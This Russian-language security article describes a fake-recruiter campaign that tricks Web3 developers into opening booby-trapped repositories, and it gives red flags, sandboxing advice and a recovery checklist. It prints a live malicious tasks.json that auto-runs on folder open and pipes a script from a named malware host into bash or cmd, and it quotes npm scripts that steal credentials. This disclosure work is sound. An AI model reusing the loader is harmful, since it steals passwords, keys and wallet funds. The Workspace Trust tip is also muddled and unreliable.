Заразное собеседование: Как фейковые рекрутеры взламывают разработчиков

Краткое содержание: Новая волна атак, спонсируемых государствами, бьет по сеньор-разработчикам в крипте. Мошенники притворяются рекрутерами или CTO и заставляют кандидата открыть вредоносный код. Эта статья разбирает кейс "Martin Erazo", эксплойт "tasks.json" в VS Code и "Протокол Сжигания", необходимый для выживания.

Дисклеймер: Эта статья сообщает о конкретных инцидентах кибербезопасности, связанных с выдачей себя за реальных людей. Имена "Martin Erazo" и "Ara Vartanian" относятся к персонам или личностям, использованным атакующими. Мы полагаем, что реальные люди с этими именами являются невинными жертвами кражи личности и не причастны к вредоносной деятельности.

---

---

1. Идеальная наживка: Персона "Martin Erazo"

Начинается с сообщения, которое бьет по всем правильным точкам для сеньора:

• Роль: CTO / Ведущий Архитектор.
• Бюджет: $6M подтвержденного финансирования.
• Стек: Web3, AI, Децентрализованная инфраструктура.

В недавних подтвержденных атаках рекрутер под именем "Martin Erazo" связывается через LinkedIn. Профиль использует имя и фото реального театрального режиссера, но история работы подделана и внезапно меняется на "IT Project Management" в 2025 году — классический признак взломанного или купленного аккаунта.

Скам движется быстро. Они пропускают стандартный HR-скрининг и идут прямо к "техническому интервью" с топ-менеджментом — в данном случае, выдавая себя за реального индустриального CTO Ara Vartanian (сейчас в Limit Break).

Красный флаг: Имя проекта постоянно меняется. Рекрутер продает "Betfin" (GameFi платформа), но присланная презентация (deck) — для "SpaceXView" (метаверс проект). Эта несостыковка — доказательство того, что мошенники переиспользуют ассеты между разными кампаниями.

2. Ловушка: "Посмотрите наш MVP код"

Фейковый "CTO" утверждает, что ему нужен ваш экспертный взгляд на их MVP код. Они присылают ссылку на GitHub репозиторий или ZIP архив. Они давят на вас, чтобы вы открыли его во время интервью или сразу после.

Здесь и происходит атака.

Они эксплуатируют вашу готовность помочь и ваше эго. Вы думаете, что ищете баги в React компонентах. В реальности баг — это "фича", созданная для кражи ваших сбережений.

3. Технический Эксплойт: Zero-Click Malware

Атакующие используют "zero-click" или "low-click" уязвимости, нацеленные на инструменты разработки. Им не нужно, чтобы вы запускали приложение. Им нужно только, чтобы вы открыли папку.

Дымящийся ствол: .vscode/tasks.json

В этом конкретном случае репозиторий включал "заряженный" файл .vscode/tasks.json. Этот файл говорит VS Code, как билдить проект.

Вредоносный код:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": Это фатальный триггер. В момент, когда вы открываете папку в VS Code, эта задача выполняется автоматически.
• Полезная нагрузка: Использует curl для скачивания скрипта с vscodesettingtask.vercel.app — известный хост малвари, замаскированный под API настроек.
• Результат: Скрипт запускается в памяти и мгновенно крадет пароли Chrome, сессионные куки и SSH ключи.

План Б: Скрипты package.json

Если эксплойт VS Code не сработал, они закладывают npm скрипты:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

Запуск npm install или npm start активирует server/server.js — локальный C2 (Command & Control) скрипт, который эксфильтрует ваши переменные окружения (Ключи AWS, Сиды кошельков) атакующему.

4. Красные флаги против Зеленых

Как заметить это, пока не стало слишком поздно?

Если вы разработчик, "приватные репозитории" или ZIP файлы должны вызывать максимальную тревогу. Легитимные компании используют публичные репозитории или тестовые задания через стандартные платформы.

Предупреждение: Это не единственный способ атаки на разработчиков. Читайте про Ловушку Коллаборатора в Discord и как Атаки на цепочку поставок компрометируют зависимости.

5. Протокол Безопасности: Как проходить интервью безопасно

Если вы сеньор-разработчик, на вас будут охотиться. Укрепление окружения обязательно.

Протокол 1: "Одноразовое" Окружение (Burner Environment)

НИКОГДА не используйте основную рабочую станцию для тестов кода.

• Виртуальные Машины: Используйте VirtualBox или VMWare.
• Облачные IDE: Используйте GitHub Codespaces или Gitpod. Они эфемерны и изолированы от файлов вашего локального кошелька.

Протокол 2: Форензик Аудит

Перед тем как даже открыть незнакомый код:

1. Проверьте .vscode/tasks.json: Ищите runOn: folderOpen.
2. Проверьте package.json: Ищите подозрительные preinstall или postinstall скрипты.
3. Поиск по ключам: Сделайте grep по curl, wget, os.homedir(), .ssh, wallet.

Протокол 3: Укрепление VS Code

Отключите "Workspace Trust" глобально.

• Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always.
• Это заставит VS Code спрашивать разрешение перед выполнением любых задач уровня папки.

6. Лечение: "Протокол Сжигания"

Если вы открыли вредоносный репозиторий (как тот, что прислала персона "Martin Erazo"), считайте, что вы скомпрометированы. Отката системы недостаточно.

1. Обрежьте связь: Выдерните Ethernet кабель немедленно.
2. Сожгите Кошельки: Ваши приватные ключи утекли. Создайте новые кошельки на чистом устройстве (телефон) и переведите оставшиеся средства. Больше никогда не используйте старые сиды.
3. Убейте Сессии: Выйдите со всех устройств в Google, GitHub, AWS. Отозвите все активные сессии.
4. Аудит SSH ключей: Проверьте настройки GitHub/GitLab. Атакующие часто добавляют свои SSH ключи, чтобы сохранить бэкдор доступ. Удалите все, что не узнаете.
5. Полное уничтожение (Nuke It): Вайпните (очистите) диск и переустановите ОС. Это единственный способ быть уверенным на 100%, что руткиты ушли.

Заключение

Скам "Заразное собеседование" использует вашу экспертизу как оружие против вас. Он целится в ваше желание решать проблемы. Но в Web3 паранойя — это профессиональная добродетель. Проверяйте каждую личность, "песочьте" (sandbox) каждый репозиторий и никогда не доверяйте "рекрутеру", который торопит вас писать код.